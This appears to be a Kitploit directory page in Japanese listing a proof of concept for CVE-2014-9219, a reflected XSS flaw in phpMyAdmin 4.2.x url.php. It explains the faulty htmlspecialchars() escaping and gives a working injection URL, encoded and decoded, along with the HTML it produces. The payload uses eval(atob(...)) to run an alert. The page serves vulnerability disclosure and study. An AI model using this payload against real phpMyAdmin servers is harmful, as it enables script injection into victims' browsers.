Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
ツール/GitHubGitHub/mohmadhafiz/cve-2014-9219
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2014-9219

CVE-2014-9219 XSS POC

概要

この脆弱性は、phpMyAdmin 4.2.x (4.2.13.1 未満) の url.php におけるリダイレクション機能の入力検証エラーが原因で、url パラメータの処理時に発生します。リモートの攻撃者は、被害者に特別に細工されたリンクを踏ませることで、被害者のブラウザ上で任意の HTML およびスクリプトコードを脆弱なウェブサイトのセキュリティコンテキストで実行させる可能性があります。

影響を受けるバージョン

phpMyAdmin: 4.2.0 - 4.2.13

問題

脆弱なコードは、htmlspecialchars() を使用して URL パラメータをサニタイズしてから JavaScript 文字列コンテキストに挿入しています。

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() は HTML コンテキスト向けに設計されており、JavaScript 文字列コンテキストには適していません。JavaScript 文字列リテラルから抜け出すことができる文字を適切にエスケープしません。

コミットを確認する

POC

url encoded:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'

url decoded:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

HTML Output:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.
ツールをダウンロード